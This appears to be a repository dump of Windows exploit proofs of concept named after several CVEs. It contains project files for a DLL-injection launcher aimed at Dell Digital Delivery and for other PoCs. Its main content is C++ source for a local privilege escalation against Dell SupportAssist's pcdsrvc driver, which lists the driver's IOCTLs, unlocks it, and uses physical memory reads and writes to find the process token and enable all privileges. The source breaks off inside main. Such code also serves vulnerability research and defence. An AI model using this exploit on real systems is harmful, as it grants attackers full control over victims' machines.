DocProject/Help/*.hhc 91 | DocProject/Help/*.hhk 92 | DocProject/Help/*.hhp 93 | DocProject/Help/Html2 94 | DocProject/Help/html 95 | 96 | # Click-Once directory 97 | publish 98 | 99 | # Others 100 | [Bb]in 101 | [Oo]bj 102 | sql 103 | TestResults 104 | *.Cache 105 | ClientBin 106 | stylecop.* 107 | ~$* 108 | *.dbmdl 109 | Generated_Code #added for RIA/Silverlight projects 110 | 111 | # Backup & report files from converting an old project file to a newer 112 | # Visual Studio version. Backup files are not needed, because we have git ;-) 113 | _UpgradeReport_Files/ 114 | Backup*/ 115 | UpgradeLog*.XML 116 | 117 | 118 | 119 | ############ 120 | ## Windows 121 | ############ 122 | 123 | # Windows image file caches 124 | Thumbs.db 125 | 126 | # Folder config file 127 | Desktop.ini 128 | 129 | 130 | ############# 131 | ## Python 132 | ############# 133 | *.py[co] 134 | 135 | # Packages 136 | *.egg 137 | *.egg-info 138 | dist 139 | build 140 | eggs 141 | parts 142 | bin 143 | var 144 | sdist 145 | develop-eggs 146 | .installed.cfg 147 | 148 | # Installer logs 149 | pip-log.txt 150 | 151 | # Unit test / coverage reports 152 | .coverage 153 | .tox 154 | 155 | #Translations 156 | *.mo 157 | 158 | #Mr Developer 159 | .mr.developer.cfg 160 | 161 | # Mac crap 162 | .DS_Store 163 | -------------------------------------------------------------------------------- /cve-2018-11072/src/ExampleProject/ExampleProject.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C} 8 | Library 9 | Properties 10 | ExampleProject 11 | ExampleProject 12 | v4.5.1 13 | 512 14 | 15 | 16 | 17 | true 18 | full 19 | false 20 | $(SolutionDir)bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | false 25 | 26 | 27 | pdbonly 28 | true 29 | $(SolutionDir)bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | false 34 | 35 | 36 | 37 | ..\..\..\..\..\..\Program Files (x86)\Dell Digital Delivery\NamedPipe.dll 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 60 | -------------------------------------------------------------------------------- /cve-2018-11072/SharpNeedle.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Launcher", "src\Launcher\Launcher.vcxproj", "{04EF8D93-523D-4270-85CB-9E341A453825}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Bootstrapper", "src\Bootstrapper\Bootstrapper.vcxproj", "{25750B19-1BF6-476E-887F-1E27464F1183}" 7 | EndProject 8 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{4B4EEF8C-17C3-4085-9FEB-AC16E4EC3AB8}" 9 | ProjectSection(SolutionItems) = preProject 10 | readme.md = readme.md 11 | src\readme.md = src\readme.md 12 | EndProjectSection 13 | EndProject 14 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ExampleProject", "src\ExampleProject\ExampleProject.csproj", "{D6C86D36-18D6-40F2-B2FD-DFC82F79252C}" 15 | EndProject 16 | Global 17 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 18 | Debug|Any CPU = Debug|Any CPU 19 | Debug|Mixed Platforms = Debug|Mixed Platforms 20 | Debug|Win32 = Debug|Win32 21 | Release|Any CPU = Release|Any CPU 22 | Release|Mixed Platforms = Release|Mixed Platforms 23 | Release|Win32 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 26 | {04EF8D93-523D-4270-85CB-9E341A453825}.Debug|Any CPU.ActiveCfg = Debug|Win32 27 | {04EF8D93-523D-4270-85CB-9E341A453825}.Debug|Mixed Platforms.ActiveCfg = Debug|Win32 28 | {04EF8D93-523D-4270-85CB-9E341A453825}.Debug|Mixed Platforms.Build.0 = Debug|Win32 29 | {04EF8D93-523D-4270-85CB-9E341A453825}.Debug|Win32.ActiveCfg = Debug|Win32 30 | {04EF8D93-523D-4270-85CB-9E341A453825}.Debug|Win32.Build.0 = Debug|Win32 31 | {04EF8D93-523D-4270-85CB-9E341A453825}.Release|Any CPU.ActiveCfg = Release|Win32 32 | {04EF8D93-523D-4270-85CB-9E341A453825}.Release|Mixed Platforms.ActiveCfg = Release|Win32 33 | {04EF8D93-523D-4270-85CB-9E341A453825}.Release|Mixed Platforms.Build.0 = Release|Win32 34 | {04EF8D93-523D-4270-85CB-9E341A453825}.Release|Win32.ActiveCfg = Release|Win32 35 | {04EF8D93-523D-4270-85CB-9E341A453825}.Release|Win32.Build.0 = Release|Win32 36 | {25750B19-1BF6-476E-887F-1E27464F1183}.Debug|Any CPU.ActiveCfg = Debug|Win32 37 | {25750B19-1BF6-476E-887F-1E27464F1183}.Debug|Mixed Platforms.ActiveCfg = Debug|Win32 38 | {25750B19-1BF6-476E-887F-1E27464F1183}.Debug|Mixed Platforms.Build.0 = Debug|Win32 39 | {25750B19-1BF6-476E-887F-1E27464F1183}.Debug|Win32.ActiveCfg = Debug|Win32 40 | {25750B19-1BF6-476E-887F-1E27464F1183}.Debug|Win32.Build.0 = Debug|Win32 41 | {25750B19-1BF6-476E-887F-1E27464F1183}.Release|Any CPU.ActiveCfg = Release|Win32 42 | {25750B19-1BF6-476E-887F-1E27464F1183}.Release|Mixed Platforms.ActiveCfg = Release|Win32 43 | {25750B19-1BF6-476E-887F-1E27464F1183}.Release|Mixed Platforms.Build.0 = Release|Win32 44 | {25750B19-1BF6-476E-887F-1E27464F1183}.Release|Win32.ActiveCfg = Release|Win32 45 | {25750B19-1BF6-476E-887F-1E27464F1183}.Release|Win32.Build.0 = Release|Win32 46 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 47 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C}.Debug|Any CPU.Build.0 = Debug|Any CPU 48 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C}.Debug|Mixed Platforms.ActiveCfg = Debug|Any CPU 49 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C}.Debug|Mixed Platforms.Build.0 = Debug|Any CPU 50 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C}.Debug|Win32.ActiveCfg = Debug|Any CPU 51 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C}.Release|Any CPU.ActiveCfg = Release|Any CPU 52 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C}.Release|Any CPU.Build.0 = Release|Any CPU 53 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C}.Release|Mixed Platforms.ActiveCfg = Release|Any CPU 54 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C}.Release|Mixed Platforms.Build.0 = Release|Any CPU 55 | {D6C86D36-18D6-40F2-B2FD-DFC82F79252C}.Release|Win32.ActiveCfg = Release|Any CPU 56 | EndGlobalSection 57 | GlobalSection(SolutionProperties) = preSolution 58 | HideSolutionNode = FALSE 59 | EndGlobalSection 60 | EndGlobal 61 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Launcher/Launcher.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {04EF8D93-523D-4270-85CB-9E341A453825} 15 | Win32Proj 16 | HaxPlusPlus 17 | 10.0.14393.0 18 | 19 | 20 | 21 | Application 22 | true 23 | v141 24 | Unicode 25 | 26 | 27 | Application 28 | false 29 | v141 30 | true 31 | Unicode 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | true 45 | $(SolutionDir)bin\$(Configuration)\ 46 | true 47 | 48 | 49 | false 50 | 51 | 52 | 53 | NotUsing 54 | Level3 55 | Disabled 56 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 57 | true 58 | true 59 | 60 | 61 | Console 62 | true 63 | 64 | 65 | 66 | 67 | Level3 68 | NotUsing 69 | MaxSpeed 70 | true 71 | true 72 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 73 | true 74 | 75 | 76 | Windows 77 | true 78 | true 79 | true 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | -------------------------------------------------------------------------------- /cve20155090/cve20155090/cve20155090.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {25D8E539-BD93-4537-9DBF-187F68395F49} 15 | Win32Proj 16 | cve20155090 17 | 18 | 19 | 20 | Application 21 | true 22 | v120 23 | Unicode 24 | 25 | 26 | Application 27 | false 28 | v120 29 | true 30 | Unicode 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | true 44 | 45 | 46 | false 47 | 48 | 49 | 50 | Use 51 | Level3 52 | Disabled 53 | WIN32;_CONSOLE;_LIB;%(PreprocessorDefinitions) 54 | true 55 | MultiThreaded 56 | 57 | 58 | Console 59 | true 60 | 61 | 62 | 63 | 64 | Level3 65 | Use 66 | MaxSpeed 67 | true 68 | true 69 | WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) 70 | true 71 | 72 | 73 | Console 74 | true 75 | true 76 | true 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | Create 90 | Create 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Bootstrapper/Bootstrapper.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {25750B19-1BF6-476E-887F-1E27464F1183} 15 | Win32Proj 16 | Venom 17 | 10.0.14393.0 18 | 19 | 20 | 21 | DynamicLibrary 22 | true 23 | v141 24 | Unicode 25 | 26 | 27 | DynamicLibrary 28 | false 29 | v141 30 | true 31 | Unicode 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | true 45 | $(SolutionDir)bin\$(Configuration)\ 46 | 47 | 48 | false 49 | true 50 | 51 | 52 | 53 | Use 54 | Level3 55 | Disabled 56 | WIN32;_DEBUG;_WINDOWS;_USRDLL;VENOM_EXPORTS;%(PreprocessorDefinitions) 57 | true 58 | 59 | 60 | Windows 61 | true 62 | 63 | 64 | 65 | 66 | Level3 67 | NotUsing 68 | MaxSpeed 69 | true 70 | true 71 | WIN32;NDEBUG;_WINDOWS;_USRDLL;VENOM_EXPORTS;%(PreprocessorDefinitions) 72 | true 73 | true 74 | 75 | 76 | Windows 77 | true 78 | true 79 | true 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | Create 91 | 92 | 93 | false 94 | 95 | 96 | false 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /cve20211648/splpoc/splpoc.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {a1c6e0c9-e078-477a-864b-7e2d435f6dcb} 25 | splpoc 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /cve-2018-11072/src/Launcher/HCommonEnsureCleanup.h: -------------------------------------------------------------------------------- 1 | // Source code courtesy of http://www.gamedeception.net/forums/184-Windows-Internals 2 | 3 | #pragma once 4 | #ifndef HCOMMON__ENSURECLEANUP_H 5 | #define HCOMMON__ENSURECLEANUP_H 6 | 7 | // Windows API 8 | #include 9 | 10 | // Hades namespace 11 | namespace Hades 12 | { 13 | // Data type representing the address of the object's cleanup function. 14 | // I used UINT_PTR so that this class works properly in 64-bit Windows. 15 | typedef VOID (WINAPI* PFNENSURECLEANUP)(UINT_PTR); 16 | 17 | // Each template instantiation requires a data type, address of cleanup 18 | // function, and a value that indicates an invalid value. 19 | template 20 | class EnsureCleanup 21 | { 22 | public: 23 | // Default constructor assumes an invalid value (nothing to cleanup) 24 | EnsureCleanup() 25 | { m_t = tInvalid; } 26 | 27 | // This constructor sets the value to the specified value 28 | EnsureCleanup(TYPE t) : m_t((UINT_PTR) t) 29 | { } 30 | 31 | // The destructor performs the cleanup. 32 | ~EnsureCleanup() 33 | { Cleanup(); } 34 | 35 | // Helper methods to tell if the value represents a valid object or not.. 36 | BOOL IsValid() const 37 | { return(m_t != tInvalid); } 38 | BOOL IsInvalid() const 39 | { return(!IsValid()); } 40 | 41 | // Re-assigning the object forces the current object to be cleaned-up. 42 | TYPE operator= (TYPE t) 43 | { 44 | Cleanup(); 45 | m_t = (UINT_PTR) t; 46 | return(*this); 47 | } 48 | 49 | // Returns the value (supports both 32-bit and 64-bit Windows). 50 | operator TYPE() const 51 | { return (TYPE) m_t; } 52 | 53 | // Cleanup the object if the value represents a valid object 54 | void Cleanup() 55 | { 56 | if (IsValid()) 57 | { 58 | // In 64-bit Windows, all parameters are 64-bits, 59 | // so no casting is required 60 | pfn(m_t); // Close the object. 61 | m_t = tInvalid; // We no longer represent a valid object. 62 | } 63 | } 64 | 65 | private: 66 | UINT_PTR m_t; // The member representing the object 67 | }; 68 | 69 | // Macros to make it easier to declare instances of the template 70 | // class for specific data types. 71 | 72 | #define MakeCleanupClass(className, tData, pfnCleanup) \ 73 | typedef EnsureCleanup className 74 | 75 | #define MakeCleanupClassX(className, tData, pfnCleanup, tInvalid) \ 76 | typedef EnsureCleanup className 78 | 79 | // Instances of the template C++ class for common data types. 80 | MakeCleanupClass(EnsureCloseHandle, HANDLE, CloseHandle); 81 | MakeCleanupClass(EnsureLocalFree, HLOCAL, LocalFree); 82 | MakeCleanupClass(EnsureGlobalFree, HGLOBAL, GlobalFree); 83 | MakeCleanupClass(EnsureGlobalUnlock, LPVOID, GlobalUnlock); 84 | MakeCleanupClass(EnsureRegCloseKey, HKEY, RegCloseKey); 85 | MakeCleanupClass(EnsureCloseServiceHandle, SC_HANDLE, CloseServiceHandle); 86 | MakeCleanupClass(EnsureCloseWindowStation, HWINSTA, CloseWindowStation); 87 | MakeCleanupClass(EnsureCloseDesktop, HDESK, CloseDesktop); 88 | MakeCleanupClass(EnsureUnmapViewOfFile, PVOID, UnmapViewOfFile); 89 | MakeCleanupClass(EnsureFreeLibrary, HMODULE, FreeLibrary); 90 | MakeCleanupClass(EnsureRemoveVEH, PVOID, RemoveVectoredExceptionHandler); 91 | MakeCleanupClassX(EnsureCloseFile, HANDLE, CloseHandle, INVALID_HANDLE_VALUE); 92 | 93 | // Special class for releasing a reserved region. 94 | // Special class is required because VirtualFree requires 3 parameters 95 | class EnsureReleaseRegion 96 | { 97 | public: 98 | EnsureReleaseRegion(PVOID pv = NULL) : m_pv(pv) 99 | { } 100 | 101 | ~EnsureReleaseRegion() 102 | { Cleanup(); } 103 | 104 | PVOID operator= (PVOID pv) 105 | { 106 | Cleanup(); 107 | m_pv = pv; 108 | return(m_pv); 109 | } 110 | 111 | operator PVOID() const 112 | { return(m_pv); } 113 | 114 | void Cleanup() 115 | { 116 | if (m_pv != NULL) 117 | { 118 | VirtualFree(m_pv, 0, MEM_RELEASE); 119 | m_pv = NULL; 120 | } 121 | } 122 | 123 | private: 124 | PVOID m_pv; 125 | }; 126 | 127 | // Special class for freeing a block from a heap 128 | // Special class is required because HeapFree requires 3 parameters 129 | class EnsureHeapFree 130 | { 131 | public: 132 | EnsureHeapFree(PVOID pv = NULL, HANDLE hHeap = GetProcessHeap()) 133 | : m_pv(pv), m_hHeap(hHeap) 134 | { } 135 | ~EnsureHeapFree() 136 | { Cleanup(); } 137 | 138 | PVOID operator= (PVOID pv) 139 | { 140 | Cleanup(); 141 | m_pv = pv; 142 | return(m_pv); 143 | } 144 | 145 | operator PVOID() const 146 | { return(m_pv); } 147 | 148 | void Cleanup() 149 | { 150 | if (m_pv != NULL) 151 | { 152 | HeapFree(m_hHeap, 0, m_pv); 153 | m_pv = NULL; 154 | } 155 | } 156 | 157 | private: 158 | HANDLE m_hHeap; 159 | PVOID m_pv; 160 | }; 161 | 162 | // Special class for releasing a remote reserved region. 163 | // Special class is required because VirtualFreeEx requires 4 parameters 164 | class EnsureReleaseRegionEx 165 | { 166 | public: 167 | EnsureReleaseRegionEx(PVOID pv = NULL, HANDLE proc = NULL) : m_pv(pv), 168 | m_proc(proc) 169 | { } 170 | ~EnsureReleaseRegionEx() 171 | { Cleanup(); } 172 | 173 | PVOID operator= (PVOID pv) 174 | { 175 | Cleanup(); 176 | m_pv = pv; 177 | return(m_pv); 178 | } 179 | 180 | operator PVOID() const 181 | { return(m_pv); } 182 | 183 | void Cleanup() 184 | { 185 | if (m_pv != NULL && m_proc != NULL) 186 | { 187 | VirtualFreeEx(m_proc, m_pv, 0, MEM_RELEASE); 188 | m_pv = NULL; 189 | } 190 | } 191 | 192 | private: 193 | PVOID m_pv; 194 | HANDLE m_proc; 195 | }; 196 | 197 | // Special class for closing the clipboard. 198 | // Special class is required because no params are required. 199 | class EnsureCloseClipboard 200 | { 201 | public: 202 | EnsureCloseClipboard(BOOL Success) : m_Success(Success) 203 | { } 204 | ~EnsureCloseClipboard() 205 | { Cleanup(); } 206 | 207 | BOOL operator= (BOOL Success) 208 | { 209 | Cleanup(); 210 | m_Success = Success; 211 | return(m_Success); 212 | } 213 | 214 | operator BOOL() const 215 | { return(m_Success); } 216 | 217 | void Cleanup() 218 | { 219 | if (m_Success) 220 | { 221 | CloseClipboard(); 222 | m_Success = FALSE; 223 | } 224 | } 225 | 226 | private: 227 | BOOL m_Success; 228 | }; 229 | } 230 | 231 | #endif // HCOMMON__ENSURECLEANUP_H 232 | -------------------------------------------------------------------------------- /dell-support-assist/dell-sa-lpe.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "ntdll.lib") 6 | 7 | SIZE_T GetProcessToken(); 8 | 9 | typedef struct _SYSTEM_HANDLE 10 | { 11 | ULONG ProcessId; 12 | UCHAR ObjectTypeNumber; 13 | UCHAR Flags; 14 | USHORT Handle; 15 | PVOID Object; 16 | ACCESS_MASK GrantedAccess; 17 | } SYSTEM_HANDLE, *PSYSTEM_HANDLE; 18 | 19 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { 20 | USHORT UniqueProcessId; 21 | USHORT CreatorBackTraceIndex; 22 | UCHAR ObjectTypeIndex; 23 | UCHAR HandleAttributes; 24 | USHORT HandleValue; 25 | PVOID Object; 26 | ULONG GrantedAccess; 27 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; 28 | 29 | typedef struct _SYSTEM_HANDLE_INFORMATION // Size=20 30 | { 31 | ULONG NumberOfHandles; // Size=4 Offset=0 32 | SYSTEM_HANDLE Handles[1]; // Size=16 Offset=4 33 | } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; 34 | 35 | // pcdsrvc driver ioctls 36 | // 0x222004 = driver activation ioctl 37 | // 0x222314 = IoDriver::writePortData 38 | // 0x22230c = IoDriver::writePortData 39 | // 0x222304 = IoDriver::writePortData 40 | // 0x222300 = IoDriver::readPortData 41 | // 0x222308 = IoDriver::readPortData 42 | // 0x222310 = IoDriver::readPortData 43 | // 0x222700 = EcDriver::readData 44 | // 0x222704 = EcDriver::writeData 45 | // 0x222080 = MemDriver::getPhysicalAddress 46 | // 0x222084 = MemDriver::readPhysicalMemory 47 | // 0x222088 = MemDriver::writePhysicalMemory 48 | // 0x222180 = Msr::readMsr 49 | // 0x222184 = Msr::writeMsr 50 | // 0x222104 = PciDriver::readConfigSpace 51 | // 0x222108 = PciDriver::writeConfigSpace 52 | // 0x222110 = PciDriver::? 53 | // 0x22210c = PciDriver::? 54 | // 0x222380 = Port1394::doesControllerExist 55 | // 0x222384 = Port1394::getControllerConfigRom 56 | // 0x22238c = Port1394::getGenerationCount 57 | // 0x222388 = Port1394::forceBusReset 58 | // 0x222680 = SmbusDriver::genericRead 59 | // 0x222318 = SystemDriver::readCmos8 60 | // 0x22231c = SystemDriver::writeCmos8 61 | // 0x222600 = SystemDriver::getDevicePdo 62 | // 0x222604 = SystemDriver::getIntelFreqClockCounts 63 | // 0x222608 = SystemDriver::getAcpiThermalZoneInfo 64 | 65 | // 66 | // @dronesec pcdrsvc_x64 LPE 67 | // uses a variation of rewolf's EPROCESS hunting. Instead of searching for pool tags, we fetch the 68 | // virtual address of our token then hunt for it in physical mem by identifying the address byte index 69 | // and TokenLuid. We then enable all privileges on the token. 70 | // 71 | // The MSR read/write ioctls are also interesting, but likely a bit trickier to exploit on Win10 without arb write 72 | // 73 | 74 | #define DRIVER_UNLOCK 0x222004 75 | #define MEM_GETPHYSICAL 0x222080 76 | #define MEM_READPHYSICAL 0x222084 77 | #define MEM_WRITEPHYSICAL 0x222088 78 | 79 | SIZE_T TokenId = 0x0; 80 | 81 | typedef struct _MEMORY_OP 82 | { 83 | SIZE_T PhysicalAddress; 84 | unsigned int BufferLength; 85 | char DoWrite; 86 | unsigned char Payload[8]; 87 | } MEMORY_OP; 88 | 89 | // the driver won't work without an unlock ioctl first (lol) 90 | BOOL UnlockDriver(HANDLE hDriver) 91 | { 92 | BOOL bResult; 93 | DWORD dwRet; 94 | SIZE_T code = 0xA1B2C3D4, outBuf; 95 | 96 | // ioctl doesn't actually return anything, but the out buffer size MUST be >= 4 97 | bResult = DeviceIoControl(hDriver, DRIVER_UNLOCK, &code, sizeof(SIZE_T), &outBuf, sizeof(SIZE_T), &dwRet, NULL); 98 | return bResult; 99 | } 100 | 101 | // write to the specified physical address 102 | DWORD WritePhysicalMem(HANDLE hDriver, MEMORY_OP mw) 103 | { 104 | SIZE_T getAddr, outAddr, TokenAddr; 105 | BOOL bResult; 106 | DWORD dwRetBytes, dwToken; 107 | 108 | DeviceIoControl(hDriver, 109 | MEM_WRITEPHYSICAL, 110 | &mw, 111 | sizeof(MEMORY_OP), 112 | 0, 113 | 0, 114 | &dwRetBytes, 115 | 0); 116 | 117 | if (bResult) 118 | printf("Wrote %d bytes\n", dwRetBytes); 119 | else 120 | printf("Failed write: %d\n", GetLastError()); 121 | 122 | return dwRetBytes > 0; 123 | } 124 | 125 | // read out a hunk of memory 126 | LPVOID ReadBlockMem(HANDLE hDriver, SIZE_T uPhysicalAddr, SIZE_T uBlockSize) 127 | { 128 | MEMORY_OP mw; 129 | LPVOID lpOutBuf; 130 | DWORD dwRval; 131 | 132 | if (uBlockSize > 0x20000000) 133 | return NULL; 134 | 135 | lpOutBuf = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, uBlockSize); 136 | 137 | mw.PhysicalAddress = uPhysicalAddr; 138 | mw.BufferLength = uBlockSize; 139 | mw.DoWrite = 0; 140 | 141 | if (!DeviceIoControl(hDriver, 142 | MEM_READPHYSICAL, 143 | &mw, 144 | sizeof(MEMORY_OP), 145 | lpOutBuf, 146 | uBlockSize, 147 | &dwRval, 148 | 0)) { 149 | printf("Reading failed: %d\n", GetLastError()); 150 | return; 151 | } 152 | 153 | printf("Returned %d bytes\n", dwRval); 154 | return lpOutBuf; 155 | } 156 | 157 | // populate token id 158 | DWORD FetchTokenId() 159 | { 160 | PTOKEN_STATISTICS tokenstat; 161 | HANDLE hToken; 162 | DWORD dwSize; 163 | 164 | OpenProcessToken(OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId()), TOKEN_ALL_ACCESS, &hToken); 165 | 166 | GetTokenInformation(hToken, TokenStatistics, 0, 0, &dwSize); 167 | tokenstat = (PTOKEN_STATISTICS)malloc(dwSize); 168 | GetTokenInformation(hToken, TokenStatistics, tokenstat, dwSize, &dwSize); 169 | 170 | TokenId = tokenstat->TokenId.LowPart; 171 | printf("Token LUID is %08x\n", TokenId); 172 | 173 | CloseHandle(hToken); 174 | free(tokenstat); 175 | } 176 | 177 | // search through physical mem for our token 178 | SIZE_T FindTokenAddress(HANDLE hDriver, SIZE_T VirtualAddress) 179 | { 180 | SIZE_T uStartAddr = 0x10000000, hTokenAddr = 0x0; 181 | LPVOID lpMemBuf; 182 | 183 | printf("Token Virtual: %10x\n", VirtualAddress); 184 | 185 | // iterate over VA byte index 186 | uStartAddr = uStartAddr + (VirtualAddress & 0xfff); 187 | 188 | for (USHORT chunk = 0; chunk < 0xb; ++chunk) { 189 | lpMemBuf = ReadBlockMem(hDriver, uStartAddr, 0x10000000); 190 | for(SIZE_T i = 0; i < 0x10000000; i += 0x1000, uStartAddr += 0x1000){ 191 | if (memcmp((DWORD)lpMemBuf + i, "User32 ", 8) == 0){ 192 | 193 | // we've got a user token with the same byte index, check the TokenID to confirm 194 | if (TokenId <= 0x0) 195 | FetchTokenId(); 196 | 197 | if (*(DWORD*)((char*)lpMemBuf + i + 0x10) == TokenId) { 198 | hTokenAddr = uStartAddr; 199 | break; 200 | } 201 | } 202 | } 203 | 204 | HeapFree(GetProcessHeap(), 0, lpMemBuf); 205 | 206 | if (hTokenAddr > 0x0) 207 | break; 208 | } 209 | 210 | return hTokenAddr; 211 | } 212 | 213 | // get the virtual of our token 214 | SIZE_T GetHandleAddress(ULONG dwProcessId, SIZE_T hObject) 215 | { 216 | DWORD dwHandleSize = 4096 * 16 * 16; 217 | BYTE* HandleInformation; 218 | DWORD BytesReturned; 219 | ULONG i; 220 | 221 | HandleInformation = (BYTE*)malloc(dwHandleSize); 222 | 223 | // Get handle information 224 | while (NtQuerySystemInformation(16, HandleInformation, dwHandleSize, &BytesReturned) != 0) 225 | HandleInformation = (BYTE*)realloc(HandleInformation, dwHandleSize *= 2); 226 | 227 | // Find handle 228 | PSYSTEM_HANDLE_INFORMATION HandleInfo = (PSYSTEM_HANDLE_INFORMATION)HandleInformation; 229 | PSYSTEM_HANDLE_TABLE_ENTRY_INFO CurrentHandle = &HandleInfo->Handles[0]; 230 | 231 | for (i = 0; iNumberOfHandles; CurrentHandle++, i++) 232 | { 233 | if (CurrentHandle->UniqueProcessId == dwProcessId && 234 | CurrentHandle->HandleValue == (SIZE_T)hObject) 235 | { 236 | return CurrentHandle->Object; 237 | } 238 | } 239 | 240 | return NULL; 241 | } 242 | 243 | SIZE_T GetProcessToken() 244 | { 245 | SIZE_T dwToken; 246 | HANDLE hToken; 247 | 248 | if (!OpenProcessToken(OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId()), TOKEN_QUERY | TOKEN_QUERY_SOURCE, &hToken)){ 249 | printf("[-] Failed to get token!\n"); 250 | return -1; 251 | } 252 | 253 | dwToken = (SIZE_T)hToken & 0xffff; 254 | dwToken = GetHandleAddress(GetCurrentProcessId(), dwToken); 255 | 256 | return dwToken; 257 | } 258 | 259 | int main() 260 | { 261 | LPCSTR lpDeviceName = (LPCSTR)"\\\\.\\PCDSRVC{3B54B31B-D06B6431-06020200}_0"; 262 | //LPCSTR lpDeviceName = (LPCSTR)"\\\\.\\pcdsrvc_x64"; 263 | HANDLE hDriver; 264 | unsigned char *TokenPrivs = 0x0000000602980000; // default privs + SeDebugPrivilege 265 | LPVOID lpBuf, lpOutBuf; 266 | BOOL bResult; 267 | DWORD dwRetBytes, dwToken; 268 | 269 | hDriver = CreateFileA(lpDeviceName, 270 | GENERIC_READ | GENERIC_WRITE, 271 | FILE_SHARE_READ | FILE_SHARE_WRITE, 272 | NULL, 273 | OPEN_EXISTING, 274 | FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 275 | NULL); 276 | 277 | if (hDriver == INVALID_HANDLE_VALUE) { 278 | printf("Failed to open handle: %08x\n", GetLastError()); 279 | return -1; 280 | } 281 | 282 | printf("Enabling driver...\n"); 283 | if (!UnlockDriver(hDriver)) 284 | { 285 | printf("Failed to unlock driver!\n"); 286 | CloseHandle(hDriver); 287 | return 0; 288 | } 289 